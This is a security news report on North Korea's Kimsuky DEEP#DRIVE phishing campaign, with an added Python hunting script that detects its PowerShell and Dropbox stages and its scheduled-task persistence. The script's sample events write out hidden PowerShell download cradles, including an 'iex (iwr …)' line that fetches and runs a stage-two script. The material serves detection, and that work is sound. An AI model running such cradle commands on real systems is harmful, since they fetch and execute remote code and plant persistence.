A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors.
The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima.
“Leveraging tailored phishing lures written in Korean and disguised as legitimate documents, the attackers successfully infiltrated targeted environments,” security researchers Den Iuzvyk and Tim Peck said in a report shared with The Hacker News, describing the activity as a “sophisticated and multi-stage operation.”
The decoy documents, sent via phishing emails as .HWP, .XLSX, and .PPTX files, are disguised as work logs, insurance documents, and crypto-related files to trick recipients into opening them, thereby triggering the infection process.
The attack chain is notable for its heavy reliance on PowerShell scripts at various stages, including payload delivery, reconnaissance, and execution. It is also characterized by the use of Dropbox for both payload distribution and data exfiltration.
It all starts with a ZIP archive containing a single Windows shortcut (.LNK) file that masquerades as a legitimate document. When extracted and launched, the shortcut triggers the execution of PowerShell code that retrieves and displays a lure document hosted on Dropbox, while stealthily establishing persistence on the Windows host via a scheduled task named “ChromeUpdateTaskMachine.”
One such lure document, written in Korean, pertains to a safety work plan for forklift operations at a logistics facility, covering the safe handling of heavy cargo and outlining measures to ensure compliance with workplace safety standards.
The PowerShell script is also designed to contact the same Dropbox location to fetch another PowerShell script that is responsible for gathering and exfiltrating system information. Additionally, it drops a third PowerShell script that is ultimately responsible for executing an unknown .NET assembly.
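As an added illustration (not code from the Securonix report or from The Hacker News), the following Python hunts two of the stages described above in endpoint telemetry: PowerShell spawned from Explorer (the shape a double-clicked .LNK produces) with a download cradle that pulls from Dropbox, and scheduled-task creation either using the “ChromeUpdateTaskMachine” name from the report or, more generally, running a hidden PowerShell download cradle. The event records, the Dropbox and cradle regular expressions, the rule names and the severities are all constructed for this example; only the task name and the Explorer/LNK/PowerShell/Dropbox chain come from the report.

```python
"""Hunt for the DEEP#DRIVE-style chain in process and scheduled-task telemetry.

Rule 1: Explorer -> PowerShell with a Dropbox download cradle (LNK stage).
Rule 2: scheduled task named as in the report, or any new task whose action
        is a hidden PowerShell download cradle (persistence stage).
"""
import re
from dataclasses import dataclass
from typing import Optional

# Indicator taken from the report.
TASK_NAME_IOC = "ChromeUpdateTaskMachine"

# Assumed patterns (ours, not the report's): Dropbox share/content hosts,
# common PowerShell download/execute primitives, and the hidden-window switch.
DROPBOX_RE = re.compile(r"(?:dl\.dropboxusercontent\.com|(?:www\.)?dropbox\.com/)", re.I)
CRADLE_RE = re.compile(
    r"(?:iwr|invoke-webrequest|downloadstring|downloadfile|invoke-expression"
    r"|\biex\b|-e(?:nc|ncodedcommand|c)?\b)",
    re.I,
)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
POWERSHELL_RE = re.compile(r"(?:powershell|pwsh)(?:\.exe)?\b", re.I)


@dataclass
class Finding:
    rule: str
    severity: str
    detail: str


def check_process(ev: dict) -> Optional[Finding]:
    """Rule 1: PowerShell launched by explorer.exe with a Dropbox cradle."""
    if ev.get("type") != "process" or not POWERSHELL_RE.search(ev.get("image", "")):
        return None
    cmd = ev.get("cmdline", "")
    from_explorer = ev.get("parent", "").lower().endswith("explorer.exe")
    if from_explorer and DROPBOX_RE.search(cmd) and CRADLE_RE.search(cmd):
        return Finding("lnk_powershell_dropbox_cradle", "high", cmd)
    return None


def check_task(ev: dict) -> Optional[Finding]:
    """Rule 2: persistence via a scheduled task."""
    if ev.get("type") != "task":
        return None
    name, action = ev.get("name", ""), ev.get("action", "")
    if name == TASK_NAME_IOC:
        return Finding("task_name_ioc", "high", f"{name}: {action}")
    if POWERSHELL_RE.search(action) and (HIDDEN_RE.search(action) or CRADLE_RE.search(action)):
        return Finding("task_powershell_cradle", "medium", f"{name}: {action}")
    return None


def analyze(events: list) -> list:
    """Run both rules over every event and return the findings in order."""
    out = []
    for ev in events:
        for f in (check_process(ev), check_task(ev)):
            if f is not None:
                out.append(f)
    return out


# Constructed sample telemetry (not captured data): two records shaped after
# the chain in the report, plus two benign records as noise.
SAMPLE_EVENTS = [
    {"type": "process",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iwr '
                'https://www.dropbox.com/scl/fi/EXAMPLE/lure.hwp?dl=1 '
                '-OutFile $env:TEMP\\lure.hwp; ii $env:TEMP\\lure.hwp"'},
    {"type": "task",
     "name": "ChromeUpdateTaskMachine",
     "action": 'powershell.exe -w hidden -c "iex (iwr '
               'https://www.dropbox.com/scl/fi/EXAMPLE/stage2.ps1?dl=1).Content"'},
    {"type": "process",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Service"},
    {"type": "task",
     "name": "NightlyBackup",
     "action": r"C:\Tools\backup.exe --full"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.detail}")
```

The task-name match is the cheap win but also the most brittle one, since the name is trivially changed between campaigns; the second branch of check_task and the Explorer-to-PowerShell rule are what survive a rename. In production the same logic maps onto Sysmon Event ID 1 (process creation) and Security Event ID 4698 (task created) fields rather than these dictionaries.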
“The use of OAuth token-based authentication for Dropbox API interactions allowed seamless exfiltration of reconnaissance data, such as system information and active processes, to predetermined folders,” the researchers said.
“This cloud-based infrastructure demonstrates an effective yet stealthy method of hosting and retrieving payloads, bypassing traditional IP or domain blocklists. Furthermore, the infrastructure appeared dynamic and short-lived, as evidenced by the rapid removal of key links after initial stages of the attack, a tactic that not only complicates analysis but also suggests the attackers actively monitor their campaigns for operational security.”
Securonix said it was able to leverage the OAuth tokens to gain further insight into the threat actor’s infrastructure, finding evidence that the campaign may have been underway since September last year.
“Despite the missing final stage, the analysis highlights the sophisticated methods employed, including obfuscation, stealthy execution, and dynamic file processing, which demonstrate the attacker’s intent to evade detection and complicate incident response,” the researchers concluded.